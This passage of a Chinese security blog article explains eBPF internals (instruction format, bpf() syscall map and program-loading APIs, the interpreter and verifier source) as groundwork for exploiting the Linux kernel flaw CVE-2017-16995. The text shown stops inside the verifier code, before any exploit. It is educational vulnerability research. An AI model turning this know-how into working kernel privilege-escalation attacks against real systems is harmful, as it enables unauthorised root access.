BPF漏洞初识——cve-2017-16995详细分析-安全KER

Linux内核为了执行效率，损失了很多安全性。但是在用户空间很难触发内核代码，所以给内核漏洞利用造成了很大的困难。但是BPF使得用户空间拥有了与内核通信和数据共享的能力，所以成为了内核漏洞的高发区。本文以CVE-2017-16995漏洞初步学习了BPF漏洞的利用技巧。若有错误，敬请各位师傅斧正。

基础知识

eBPF简介

linux的用户层和内核层是隔离的，如果想让内核空间执行用户的代码，正常流程是编写内核模块。但是内核模块的编写执行需要有root权限，这对于攻击者是不理想的。而 BPF(Berkeley Packet Filter)则使普通用户拥有了让内核执行用户代码并共享数据的能力。用户可以将eBPF指令字节码传输给内核，然后通过socket写事件来触发内核执行代码。并且用户空间和内核空间会共享同一个map内存，且用户空间和内核空间都对其拥有读写能力。这就为攻击者提供了极大的便利。BPF发展经历了 2 个阶段，cBPF(classic BPF)和 eBPF(extended BPF)，cBPF已退出历史舞台，所以后文的BPF都指eBPF。

eBPF虚拟指令系统

eBPF虚拟指令系统属于 RISC，拥有 11 个虚拟寄存器 r0-r10（其中 r10为只读的帧指针）。在实际运行时，虚拟机会把这些寄存器一一对应于硬件 CPU的物理寄存器，以 x64为例，对应关系如下：

    R0 - rax
    R1 - rdi
    R2 - rsi
    R3 - rdx
    R4 - rcx
    R5 - r8
    R6 - rbx
    R7 - r13
    R8 - r14
    R9 - r15
    R10 - rbp（帧指针，frame pointer）

eBPF的指令格式如下：

/*
 * One eBPF instruction: an 8-bit opcode, two 4-bit register numbers packed
 * into a single byte, a signed 16-bit offset and a signed 32-bit immediate.
 */
struct bpf_insn {
    __u8    code;       /* opcode */
    __u8    dst_reg:4;  /* dest register */
    __u8    src_reg:4;  /* source register */
    __s16   off;        /* signed offset */
    __s32   imm;        /* signed immediate constant */
};

例如一条简单的x86指令 mov edi, 0xffffffff，其eBPF的指令结构如下：

/*
 * Build a 32-bit "move immediate" instruction: dst_reg = IMM.
 * The opcode combines the BPF_ALU class with the BPF_MOV operation and the
 * BPF_K (immediate operand) source; src_reg and off are unused and set to 0.
 */
#define BPF_MOV32_IMM(DST, IMM)                 \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_K,     \
        .dst_reg = DST,                 \
        .src_reg = 0,                   \
        .off   = 0,                 \
        .imm   = IMM })

所以，最后编写的格式如下BPF_MOV32_IMM(BPF_REG_1, 0xFFFFFFFF)，其字节码为：\xb4\x01\x00\x00\xff\xff\xff\xff（第二个字节的低 4位是目的寄存器编号，若目的寄存器为 BPF_REG_9，则该字节为 \x09）。

BPF加载过程

一个 BPF的正常程序流程为：

用户程序调用 syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr))申请创建一个 map，在 attr结构体中指定 map的类型、key大小、value大小、最大容量等属性。在下面的示例代码中，这一调用由 bpf_create_map经 sys_bpf封装完成，最终返回 map的文件描述符。这个 map是用户态和内核态共享的，因此后续内核态和用户态都可以对这块共享内存进行读写：

//lib/bpf.c
int bpf_create_map(enum bpf_map_type map_type, 
int key_size,int value_size, int max_entries)
{
 union bpf_attr attr;

 memset(&attr, '\0', sizeof(attr));

 attr.map_type = map_type;
 attr.key_size = key_size;
 attr.value_size = value_size;
 attr.max_entries = max_entries;

 return sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}
//lib/bpf.c
/*
 * Thin wrapper around the raw bpf system call: forwards cmd, attr and size
 * to syscall(__NR_bpf, ...) and returns its result as an int.
 */
static int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr,
        unsigned int size)
{
 long rc = syscall(__NR_bpf, cmd, attr, size);

 return rc;
}
//bpf.h
/*
 * Argument block passed to the bpf system call. It is a union of anonymous
 * structs; which struct is meaningful depends on the command being issued,
 * as noted on each member below. The whole union is 8-byte aligned.
 */
union bpf_attr {
 struct { /* anonymous struct used by BPF_MAP_CREATE command */
     __u32   map_type;   /* one of enum bpf_map_type */
     __u32   key_size;   /* size of key in bytes */
     __u32   value_size; /* size of value in bytes */
     __u32   max_entries;    /* max number of entries in a map */
 };

 struct { /* anonymous struct used by BPF_MAP_*_ELEM commands */
     __u32       map_fd;
     __aligned_u64   key;
     union {
         __aligned_u64 value;
         __aligned_u64 next_key;
     };
     __u64       flags;
 };

 struct { /* anonymous struct used by BPF_PROG_LOAD command */
     __u32       prog_type;  /* one of enum bpf_prog_type */
     __u32       insn_cnt;
     __aligned_u64   insns;
     __aligned_u64   license;
     __u32       log_level;  /* verbosity level of verifier */
     __u32       log_size;   /* size of user buffer */
     __aligned_u64   log_buf;    /* user supplied buffer */
     __u32       kern_version;   /* checked when prog_type=kprobe */
 };

 struct { /* anonymous struct used by BPF_OBJ_* commands */
     __aligned_u64   pathname;
     __u32       bpf_fd;
 };
} __attribute__((aligned(8)));
//bpf.h
/* BPF syscall commands, see bpf(2) man-page for details. */
/* Command selector: the second argument of syscall(__NR_bpf, cmd, attr, size). */
enum bpf_cmd {
 BPF_MAP_CREATE,	/* create a map, return a file descriptor for it */
 BPF_MAP_LOOKUP_ELEM,	/* look up an element by key */
 BPF_MAP_UPDATE_ELEM,	/* create or update a key/value pair */
 BPF_MAP_DELETE_ELEM,	/* look up and delete an element by key */
 BPF_MAP_GET_NEXT_KEY,	/* return the key following a given key */
 BPF_PROG_LOAD,		/* verify and load a program, return its fd */
 BPF_OBJ_PIN,		/* BPF_OBJ_* commands use the pathname/bpf_fd attr */
 BPF_OBJ_GET,
};

用户程序调用 syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr))来将我们写的 BPF代码加载进内核，attr结构体中包含了指令数量、指令首地址、日志级别等属性。在加载之前会利用虚拟执行的方式来做安全性校验，这个校验包括对指令语法的检查、指令数量的检查、指令中的指针和立即数的范围及读写权限检查，禁止将内核中的地址暴露给用户空间，禁止对 BPF程序 stack之外的内核地址读写。安全校验通过后，程序被成功加载至内核，后续真正执行时，不再重复做检查；
用户程序通过调用 setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd))将我们写的 BPF程序绑定到指定的 socket上，progfd为上一步骤的返回值；
用户程序通过操作上一步骤中的 socket来触发 BPF真正执行。

eBPF代码执行过程

对 eBPF指令的解释执行，最后会进入 __bpf_prog_run函数。可以看到这里是根据指令，对寄存器进行了相应的操作。如果后续要分析 eBPF指令的执行过程，就需要对这个函数进行深入分析。(此处代码经过省略)，可以看到 __bpf_prog_run函数自己使用栈模拟了一个 ebpf程序的栈和寄存器。所以，ebpf程序的指令是能够直接控制内核栈数据，为后续漏洞利用提供了方便。

/**
 *    __bpf_prog_run - run eBPF program on a given context
 *    @ctx: is the data we are operating on
 *    @insn: is the array of eBPF instructions
 *
 * Decode and execute eBPF instructions.
 *
 * This is an abridged excerpt: the "..." markers stand for code that the
 * article left out. Dispatch is a computed goto through jumptable[],
 * indexed by the opcode byte of the current instruction.
 */
static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
{
    /* The program's stack and register file are locals of this function. */
    u64 stack[MAX_BPF_STACK / sizeof(u64)];
    u64 regs[MAX_BPF_REG], tmp;
    static const void *jumptable[256] = {
        /* Every opcode defaults to the "unknown opcode" handler. */
        [0 ... 255] = &&default_label,
        /* Now overwrite non-defaults ... */
        /* 32 bit ALU operations */
        [BPF_ALU | BPF_ADD | BPF_X] = &&ALU_ADD_X,
        [BPF_ALU | BPF_ADD | BPF_K] = &&ALU_ADD_K,
        [BPF_ALU | BPF_SUB | BPF_X] = &&ALU_SUB_X,
        [BPF_ALU | BPF_SUB | BPF_K] = &&ALU_SUB_K,
        ...        // (entries elided in the article)
        [BPF_LD | BPF_ABS | BPF_B] = &&LD_ABS_B,
        [BPF_LD | BPF_IND | BPF_W] = &&LD_IND_W,
        [BPF_LD | BPF_IND | BPF_H] = &&LD_IND_H,
        [BPF_LD | BPF_IND | BPF_B] = &&LD_IND_B,
        [BPF_LD | BPF_IMM | BPF_DW] = &&LD_IMM_DW,
    };
    u32 tail_call_cnt = 0;
    void *ptr;
    int off;

    /* Both macros step to the next instruction and dispatch again;
     * in this excerpt their definitions are identical.
     */
#define CONT     ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

    /* FP is set to the address one element past the end of stack[]. */
    FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)];
    ARG1 = (u64) (unsigned long) ctx;

    /* Registers used in classic BPF programs need to be reset first. */
    regs[BPF_REG_A] = 0;
    regs[BPF_REG_X] = 0;

select_insn:
    goto *jumptable[insn->code];

    /* ALU */
    /* Each ALU() expansion emits four handlers for one operator:
     * 64-bit and 32-bit, each with a register (_X) or immediate (_K)
     * operand. The 32-bit handlers cast both operands to u32.
     */
#define ALU(OPCODE, OP)            \
    ALU64_##OPCODE##_X:        \
        DST = DST OP SRC;    \
        CONT;            \
    ALU_##OPCODE##_X:        \
        DST = (u32) DST OP (u32) SRC;    \
        CONT;            \
    ALU64_##OPCODE##_K:        \
        DST = DST OP IMM;        \
        CONT;            \
    ALU_##OPCODE##_K:        \
        DST = (u32) DST OP (u32) IMM;    \
        CONT;

    ALU(ADD,  +)
    ALU(SUB,  -)
    ALU(AND,  &)
    ALU(OR,   |)
    ALU(LSH, <<)
    ALU(RSH, >>)
    ALU(XOR,  ^)
    ALU(MUL,  *)
#undef ALU
    ALU_NEG:
        DST = (u32) -DST;
        CONT;
    ALU64_NEG:
        DST = -DST;
        CONT;
    ALU_MOV_X:
        DST = (u32) SRC;
        CONT;
    /* 32-bit move of an immediate: the value is cast to u32 first. */
    ALU_MOV_K:
        DST = (u32) IMM;
        CONT;
    ALU64_MOV_X:
        DST = SRC;
        CONT;
    /* 64-bit move of an immediate: IMM is assigned without a u32 cast. */
    ALU64_MOV_K:
        DST = IMM;
        CONT;
    /* The 64-bit constant is assembled from the imm fields of two
     * consecutive instruction slots; the extra insn++ skips the second.
     */
    LD_IMM_DW:
        DST = (u64) (u32) insn[0].imm | ((u64) (u32) insn[1].imm) << 32;
        insn++;
        CONT;
        ...
    ALU_END_TO_BE:
        switch (IMM) {
        case 16:
            DST = (__force u16) cpu_to_be16(DST);
            break;
        case 32:
            DST = (__force u32) cpu_to_be32(DST);
            break;
        case 64:
            DST = (__force u64) cpu_to_be64(DST);
            break;
        }
        CONT;
    ALU_END_TO_LE:
        switch (IMM) {
        case 16:
            DST = (__force u16) cpu_to_le16(DST);
            break;
        case 32:
            DST = (__force u32) cpu_to_le32(DST);
            break;
        case 64:
            DST = (__force u64) cpu_to_le64(DST);
            break;
        }
        CONT;

    /* CALL */
    JMP_CALL:
        /* Function call scratches BPF_R1-BPF_R5 registers,
         * preserves BPF_R6-BPF_R9, and stores return value
         * into BPF_R0.
         */
        BPF_R0 = (__bpf_call_base + insn->imm)(BPF_R1, BPF_R2, BPF_R3,
                               BPF_R4, BPF_R5);
        CONT;

    JMP_TAIL_CALL: {
        struct bpf_map *map = (struct bpf_map *) (unsigned long) BPF_R2;
        struct bpf_array *array = container_of(map, struct bpf_array, map);
        struct bpf_prog *prog;
        u64 index = BPF_R3;

        /* Index outside the array: fall through to the next insn. */
        if (unlikely(index >= array->map.max_entries))
            goto out;

        /* Bound the number of chained tail calls. */
        if (unlikely(tail_call_cnt > MAX_TAIL_CALL_CNT))
            goto out;

        tail_call_cnt++;

        prog = READ_ONCE(array->ptrs[index]);
        if (unlikely(!prog))
            goto out;

        /* ARG1 at this point is guaranteed to point to CTX from
         * the verifier side due to the fact that the tail call is
         * handeled like a helper, that is, bpf_tail_call_proto,
         * where arg1_type is ARG_PTR_TO_CTX.
         */
        insn = prog->insnsi;
        goto select_insn;
out:
        CONT;
    }
    /* JMP */
    /* Taken branches add insn->off and then CONT/CONT_JMP adds one more,
     * so the target is relative to the instruction after the jump.
     */
    JMP_JA:
        insn += insn->off;
        CONT;
    JMP_JEQ_X:
        if (DST == SRC) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JEQ_K:
        if (DST == IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JNE_X:
        if (DST != SRC) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
    JMP_JNE_K:
        if (DST != IMM) {
            insn += insn->off;
            CONT_JMP;
        }
        CONT;
        ...

    /* STX and ST and LDX*/
    /* Each LDST() expansion emits store-register, store-immediate and
     * load handlers for one access width; the address is a register
     * value plus insn->off, used directly as a pointer.
     */
#define LDST(SIZEOP, SIZE)                        \
    STX_MEM_##SIZEOP:                        \
        *(SIZE *)(unsigned long) (DST + insn->off) = SRC;    \
        CONT;                            \
    ST_MEM_##SIZEOP:                        \
        *(SIZE *)(unsigned long) (DST + insn->off) = IMM;    \
        CONT;                            \
    LDX_MEM_##SIZEOP:                        \
        DST = *(SIZE *)(unsigned long) (SRC + insn->off);    \
        CONT;

    LDST(B,   u8)
    LDST(H,  u16)
    LDST(W,  u32)
    LDST(DW, u64)
#undef LDST
    STX_XADD_W: /* lock xadd *(u32 *)(dst_reg + off16) += src_reg */
        atomic_add((u32) SRC, (atomic_t *)(unsigned long)
               (DST + insn->off));
        CONT;
    STX_XADD_DW: /* lock xadd *(u64 *)(dst_reg + off16) += src_reg */
        atomic64_add((u64) SRC, (atomic64_t *)(unsigned long)
                 (DST + insn->off));
        CONT;
    LD_ABS_W: /* BPF_R0 = ntohl(*(u32 *) (skb->data + imm32)) */
        off = IMM;
load_word:
        ...

    default_label:
        /* If we ever reach this, we have a bug somewhere. */
        WARN_RATELIMIT(1, "unknown opcode %02x\n", insn->code);
        return 0;
}

eBPF函数介绍

eBPF通过 bpf()系统调用的不同命令（cmd）来实现各种功能，参考手册见 bpf(2) man page。可以使用的命令如下：

//创建一个map内存，返回一个指向该map的文件描述符
BPF_MAP_CREATE
              Create a map and return a file descriptor that refers to
              the map.  The close-on-exec file descriptor flag (see
              fcntl(2)) is automatically enabled for the new file
              descriptor.
//从map内存中根据传入的key值寻找到对应的value
BPF_MAP_LOOKUP_ELEM
              Look up an element by key in a specified map and return
              its value.
//创建或更新map内存中的一个元素（key/value对）
BPF_MAP_UPDATE_ELEM
              Create or update an element (key/value pair) in a
              specified map.
//删除map中的key值
BPF_MAP_DELETE_ELEM
              Look up and delete an element by key in a specified map.
//在map中根据key值查找，并返回下一个元素
BPF_MAP_GET_NEXT_KEY
              Look up an element by key in a specified map and return
              the key of the next element.
//验证和加载eBPF程序，然后返回一个新的文件描述符
BPF_PROG_LOAD
              Verify and load an eBPF program, returning a new file
              descriptor associated with the program.  The close-on-exec
              file descriptor flag (see fcntl(2)) is automatically
              enabled for the new file descriptor.

接下来，我们依次介绍各个函数的用法。

BPF_MAP_CREATE

该函数用于创建一个新的 map内存，返回一个新的文件描述符，并指向该内存。

/*
 * Create a new map with the BPF_MAP_CREATE command.
 *
 * The four arguments are stored in the BPF_MAP_CREATE member of
 * union bpf_attr:
 *   map_type    - one of enum bpf_map_type
 *   key_size    - size of a key in bytes
 *   value_size  - size of a value in bytes
 *   max_entries - maximum number of entries in the map
 *
 * Returns whatever bpf() returns; per the surrounding text that is a new
 * file descriptor referring to the map.
 */
int
bpf_create_map(enum bpf_map_type map_type,
               unsigned int key_size,
               unsigned int value_size,
               unsigned int max_entries)
{
    union bpf_attr attr = {
        .map_type    = map_type,
        .key_size    = key_size,
        .value_size  = value_size,
        .max_entries = max_entries
    };

    /* The stray character that followed this statement was removed;
     * it made the function fail to compile.
     */
    return bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}

首先将传入的四个参数，分别赋值给 bpf_attr数据结构，其原型如下，包含了使用 BPF函数时所需要的各个参数。

/*
 * Argument block for bpf(), as shown in the bpf(2) manual page. Each
 * anonymous struct is used by the command(s) named in its comment; the
 * union as a whole is 8-byte aligned.
 */
union bpf_attr {
    struct {    /* Used by BPF_MAP_CREATE */
        __u32         map_type;    /* one of enum bpf_map_type */
        __u32         key_size;    /* size of key in bytes */
        __u32         value_size;  /* size of value in bytes */
        __u32         max_entries; /* maximum number of entries
                                                 in a map */
    };

    struct {    /* Used by BPF_MAP_*_ELEM and BPF_MAP_GET_NEXT_KEY
                              commands */
        __u32         map_fd;
        __aligned_u64 key;
        union {
            __aligned_u64 value;
            __aligned_u64 next_key;
        };
        __u64         flags;
    };

    struct {    /* Used by BPF_PROG_LOAD */
        __u32         prog_type;
        __u32         insn_cnt;
        __aligned_u64 insns;      /* 'const struct bpf_insn *' */
        __aligned_u64 license;    /* 'const char *' */
        __u32         log_level;  /* verbosity level of verifier */
        __u32         log_size;   /* size of user buffer */
        __aligned_u64 log_buf;    /* user supplied 'char *'
                                                buffer */
        __u32         kern_version;
        /* checked when prog_type=kprobe
                                                (since Linux 4.1) */
    };
} __attribute__((aligned(8)));

需要传入的4个参数，含义分别为：

bpf_map_type，指定创建的 map的类型，所有类型如下，用于指定建立映射的方式

/* Map kinds that can be requested through the map_type field of BPF_MAP_CREATE. */
enum bpf_map_type {
    BPF_MAP_TYPE_UNSPEC,
    BPF_MAP_TYPE_HASH,        // hash table
    BPF_MAP_TYPE_ARRAY,        // array
    BPF_MAP_TYPE_PROG_ARRAY,
    BPF_MAP_TYPE_PERF_EVENT_ARRAY,
    BPF_MAP_TYPE_PERCPU_HASH,
    BPF_MAP_TYPE_PERCPU_ARRAY,
    BPF_MAP_TYPE_STACK_TRACE,
    BPF_MAP_TYPE_CGROUP_ARRAY,
    BPF_MAP_TYPE_LRU_HASH,
    BPF_MAP_TYPE_LRU_PERCPU_HASH,
};

key_size指定了 key的数据大小，用于在后续验证 bpf程序时使用，防止越界访问。例如当一个 map创建的 key_size为8，那么此时如下函数将会被阻止。因为对于内核，其希望从源地址读取 8字节的数据，但是此时源地址为 fp-4，如果读取8字节，就会超出当前栈的边界，所以会被阻止

bpf_map_lookup_elem(map_fd, fp - 4)

同理，value_size指定了 value的数据大小。例如，当使用 value_size=1创建了 map之后，使用如下代码则会被阻止。因为，这里的 value大小为 1 字节，而却想要将其赋值为 4字节，超出了 value_size。

value = bpf_map_lookup_elem(...);
*(u32 *) value = 1;

max_entries指定了 map中最多可以容纳的元素个数

BPF_MAP_LOOKUP_ELEM

BPF_MAP_LOOKUP_ELEM函数根据传入的 key值寻找其对应的元素。

int bpf_lookup_elem(int fd, const void *key, void *value)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key    = ptr_to_u64(key),
        .value  = ptr_to_u64(value),
    };

    return bpf(BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

如果一个元素被找到，则返回0，并将该值存入传入的 value参数里，其指向了一个上一步提到的 value_size大小的 buffer。如果没有被找到，则返回 -1，并设置 errno。

BPF_MAP_UPDATE_ELEM

BPF_MAP_UPDATE_ELEM函数使用传入的 key和 value创建或者更新一个map中的元素

int bpf_update_elem(int fd, const void *key, const void *value,
                    uint64_t flags)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key    = ptr_to_u64(key),
        .value  = ptr_to_u64(value),
        .flags  = flags,
    };

    return bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

flags参数必须为如下选项之一：

BPF_ANY
    Create a new element or update an existing element.

BPF_NOEXIST
    Create a new element only if it did not exist.

BPF_EXIST
    Update an existing element.

如果成功，返回 0。若失败，则返回 -1。

BPF_MAP_DELETE_ELEM

BPF_MAP_DELETE_ELEM函数用于根据传入的 key来删除一个元素：

int bpf_delete_elem(int fd, const void *key)
{
    union bpf_attr attr = {
        .map_fd = fd,
        .key    = ptr_to_u64(key),
    };

    return bpf(BPF_MAP_DELETE_ELEM, &attr, sizeof(attr));
}

如果成功，则返回 0。如果元素未被找到，则返回 -1。

BPF_MAP_GET_NEXT_KEY

该函数根据传入的 key值寻找到对应的元素，然后返回其下一个元素的 key：

int bpf_get_next_key(int fd, const void *key, void *next_key)
{
    union bpf_attr attr = {
        .map_fd   = fd,
        .key      = ptr_to_u64(key),
        .next_key = ptr_to_u64(next_key),
    };

    return bpf(BPF_MAP_GET_NEXT_KEY, &attr, sizeof(attr));
}

如果 key被找到，则返回0，并将 next_key指向 key值的下一个元素。如果key未找到，则返回 0，并将 next_key指向第一个元素。如果 key是最后一个元素，则返回 -1，并将 errno设置为 ENOENT。

BPF_PROG_LOAD

该函数用于加载一个 eBPF程序到内核，返回一个新的指向 eBPF程序的文件描述符。

char bpf_log_buf[LOG_BUF_SIZE];

int
    bpf_prog_load(enum bpf_prog_type type,
                  const struct bpf_insn *insns, int insn_cnt,
                  const char *license)
{
    union bpf_attr attr = {
        .prog_type = type,
        .insns     = ptr_to_u64(insns),
        .insn_cnt  = insn_cnt,
        .license   = ptr_to_u64(license),
        .log_buf   = ptr_to_u64(bpf_log_buf),
        .log_size  = LOG_BUF_SIZE,
        .log_level = 1,
    };

    return bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
}

map内存可以被 eBPF程序访问，并且实现从 eBPF程序和用户空间程序交互数据。例如，eBPF程序可以获取进程数据（例如kprobe、packets）并将数据存储到map，然后用户空间程序就可以通过访问 map来获取数据。反之亦然。

BPF的安全校验

这里我们分析一下 Verifier机制，主要检测函数为 bpf_check：

/*
 * bpf_check - verify a BPF program before it is accepted.
 *
 * Steps, in order: bound the instruction count, allocate a verifier_env,
 * take bpf_verifier_lock, optionally set up the verifier log from
 * attr->log_*, replace map fds with map pointers, run check_cfg() and
 * do_check(), convert context accesses, copy the log back to user space
 * and record the maps the program uses.
 *
 * @prog: in/out pointer to the program; rewritten from env->prog on exit
 * @attr: attributes supplied with the load request (log_level, log_buf,
 *        log_size are read here)
 *
 * Returns 0 on success or a negative errno (-E2BIG, -ENOMEM, -EINVAL,
 * -ENOSPC, -EFAULT, or an error propagated from a helper).
 */
int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
{
    char __user *log_ubuf = NULL;
    struct verifier_env *env;
    int ret = -EINVAL;
    /* reject empty programs and programs longer than BPF_MAXINSNS */
    if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
        return -E2BIG;

    /* 'struct verifier_env' can be global, but since it's not small,
     * allocate/free it every time bpf_check() is called
     */
    /* allocate the (zeroed) verifier_env */
    env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
    if (!env)
        return -ENOMEM;

    env->prog = *prog;

    /* grab the mutex to protect few globals used by verifier */
    mutex_lock(&bpf_verifier_lock);

    if (attr->log_level || attr->log_buf || attr->log_size) {
        /* user requested verbose verifier output
         * and supplied buffer to store the verification trace
         */
        log_level = attr->log_level;
        log_ubuf = (char __user *) (unsigned long) attr->log_buf;
        log_size = attr->log_size;
        log_len = 0;

        ret = -EINVAL;
        /* log_* values have to be sane */
        if (log_size < 128 || log_size > UINT_MAX >> 8 ||
            log_level == 0 || log_ubuf == NULL)
            goto free_env;

        ret = -ENOMEM;
        log_buf = vmalloc(log_size);
        if (!log_buf)
            goto free_env;
    } else {
        log_level = 0;
    }
    /* look for pseudo eBPF instructions that access map FDs and
     * replace them with actual map pointers
     */
    /* Author's note: the map_fd operand of such pseudo instructions is
     * replaced by the map's address. The address is 8 bytes wide, so it
     * is split across the 4-byte imm of this instruction and the 4-byte
     * imm of the following one:
     */
    /* store map pointer inside BPF_LD_IMM64 instruction 
            insn[0].imm = (u32) (unsigned long) map;
            insn[1].imm = ((u64) (unsigned long) map) >> 32;
    */
    /* replace_map_fd_with_map_ptr() performs the rewrite described above */
    ret = replace_map_fd_with_map_ptr(env);
    if (ret < 0)
        goto skip_full_check;

    env->explored_states = kcalloc(env->prog->len,
                       sizeof(struct verifier_state_list *),
                       GFP_USER);
    ret = -ENOMEM;
    if (!env->explored_states)
        goto skip_full_check;
    /* Author's note: control-flow-graph check for loops and unreachable jumps */
    ret = check_cfg(env);
    if (ret < 0)
        goto skip_full_check;

    env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);
    /* the core per-instruction verification routine */
    ret = do_check(env);

skip_full_check:
    /* drain whatever is left on the verifier's branch stack */
    while (pop_stack(env, NULL) >= 0);
    free_states(env);

    if (ret == 0)
        /* program is valid, convert *(u32*)(ctx + off) accesses */
        ret = convert_ctx_accesses(env);

    if (log_level && log_len >= log_size - 1) {
        BUG_ON(log_len >= log_size);
        /* verifier log exceeded user supplied buffer */
        ret = -ENOSPC;
        /* fall through to return what was recorded */
    }

    /* copy verifier log back to user space including trailing zero */
    if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
        ret = -EFAULT;
        goto free_log_buf;
    }

    if (ret == 0 && env->used_map_cnt) {
        /* if program passed verifier, update used_maps in bpf_prog_info */
        env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
                              sizeof(env->used_maps[0]),
                              GFP_KERNEL);

        if (!env->prog->aux->used_maps) {
            ret = -ENOMEM;
            goto free_log_buf;
        }

        memcpy(env->prog->aux->used_maps, env->used_maps,
               sizeof(env->used_maps[0]) * env->used_map_cnt);
        env->prog->aux->used_map_cnt = env->used_map_cnt;

        /* program is valid. Convert pseudo bpf_ld_imm64 into generic
         * bpf_ld_imm64 instructions
         */
        convert_pseudo_ld_imm64(env);
    }

free_log_buf:
    if (log_level)
        vfree(log_buf);
free_env:
    if (!env->prog->aux->used_maps)
        /* if we didn't copy map pointers into bpf_prog_info, release
         * them now. Otherwise free_bpf_prog_info() will release them.
         */
        release_maps(env);
    *prog = env->prog;
    kfree(env);
    mutex_unlock(&bpf_verifier_lock);
    return ret;
}

其中主要是使用 do_check来根据不同的指令类型来做具体的合法性判断。使用的核心数据结构是 reg_state，bpf_reg_type枚举变量用来表示寄存器的类型，初始化为 NOT_INIT：

/*
 * What the verifier tracks for one register: its type plus one
 * type-dependent payload. imm and map_ptr share storage (they are members
 * of the same anonymous union), so only the one matching `type` is valid.
 */
struct reg_state {
    enum bpf_reg_type type;
    union {
        /* valid when type == CONST_IMM | PTR_TO_STACK */
        int imm;

        /* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
         *   PTR_TO_MAP_VALUE_OR_NULL
         */
        struct bpf_map *map_ptr;
    };
};
static void init_reg_state(struct reg_state *regs)
{
    int i;

    for (i = 0; i < MAX_BPF_REG; i++) {
        regs[i].type = NOT_INIT;
        regs[i].imm = 0;
        regs[i].map_ptr = NULL;
    }

    /* frame pointer */
    regs[BPF_REG_FP].type = FRAME_PTR;

    /* 1st arg to a function */
    regs[BPF_REG_1].type = PTR_TO_CTX;
}
/* types of values stored in eBPF registers */
/* Register types tracked by the verifier; NOT_INIT (0) is the initial value. */
enum bpf_reg_type {
    NOT_INIT = 0,        /* nothing was written into register */
    UNKNOWN_VALUE,       /* reg doesn't contain a valid pointer */
    PTR_TO_CTX,      /* reg points to bpf_context */
    CONST_PTR_TO_MAP,    /* reg points to struct bpf_map */
    PTR_TO_MAP_VALUE,    /* reg points to map element value */
    PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
    FRAME_PTR,       /* reg == frame_pointer */
    PTR_TO_STACK,        /* reg == frame_pointer + imm */
    CONST_IMM,       /* constant integer value */
};

do_check

/*
 * do_check - walk the program and validate it instruction by instruction.
 *
 * Starting at instruction 0 with freshly initialised register state, the
 * loop dispatches on the instruction class (ALU/ALU64, LDX, STX, ST, JMP,
 * LD) and calls the matching check_* helper. On BPF_EXIT, or when
 * is_state_visited() reports an equivalent state, the next pending branch
 * is taken from pop_stack(); the walk ends when that returns a negative
 * index.
 *
 * Returns 0 when every explored path passed, otherwise a negative errno
 * (-EFAULT, -E2BIG, -EINVAL, -EACCES, or the error returned by a helper).
 */
static int do_check(struct verifier_env *env)
{
    struct verifier_state *state = &env->cur_state;
    struct bpf_insn *insns = env->prog->insnsi;
    struct reg_state *regs = state->regs;
    int insn_cnt = env->prog->len;
    int insn_idx, prev_insn_idx = 0;
    int insn_processed = 0;
    bool do_print_state = false;

    init_reg_state(regs);
    insn_idx = 0;
    for (;;) {
        struct bpf_insn *insn;
        u8 class;
        int err;
        /* the instruction index must stay inside the program */
        if (insn_idx >= insn_cnt) {
            verbose("invalid insn idx %d insn_cnt %d\n",
                insn_idx, insn_cnt);
            return -EFAULT;
        }

        insn = &insns[insn_idx];
        class = BPF_CLASS(insn->code);
        /* cap on the total number of instructions processed */
        if (++insn_processed > 32768) {
            verbose("BPF program is too large. Proccessed %d insn\n",
                insn_processed);
            return -E2BIG;
        }
        /* Author's note: checks whether this instruction was already
         * visited; states of visited instructions are kept in the
         * env->explored_states array.
         */
        err = is_state_visited(env, insn_idx);
        if (err < 0)
            return err;
        if (err == 1) {
            /* found equivalent state, can prune the search */
            if (log_level) {
                if (do_print_state)
                    verbose("\nfrom %d to %d: safe\n",
                        prev_insn_idx, insn_idx);
                else
                    verbose("%d: safe\n", insn_idx);
            }
            goto process_bpf_exit;
        }

        if (log_level && do_print_state) {
            verbose("\nfrom %d to %d:", prev_insn_idx, insn_idx);
            print_verifier_state(env);
            do_print_state = false;
        }

        if (log_level) {
            verbose("%d: ", insn_idx);
            print_bpf_insn(env, insn);
        }
        /* arithmetic (ALU / ALU64) instructions */
        if (class == BPF_ALU || class == BPF_ALU64) {
            /* Author's note: check_alu_op() validates the individual
             * instruction, e.g. whether reserved fields are used, whether
             * register numbers exceed the maximum, whether registers are
             * readable/writable and whether a register holds a pointer.
             * The article examines this function in detail later.
             */
            err = check_alu_op(env, insn);
            if (err)
                return err;
        /* BPF_LDX instructions */
        } else if (class == BPF_LDX) {
            enum bpf_reg_type src_reg_type;

            /* check for reserved fields is already done */

            /* check src operand */
            /* Author's note: verifies the source register number is in
             * range and, as an operand, whether it is initialised and
             * whether it is a pointer.
             */
            err = check_reg_arg(regs, insn->src_reg, SRC_OP);
            if (err)
                return err;
            /* check the destination register */
            err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK);
            if (err)
                return err;
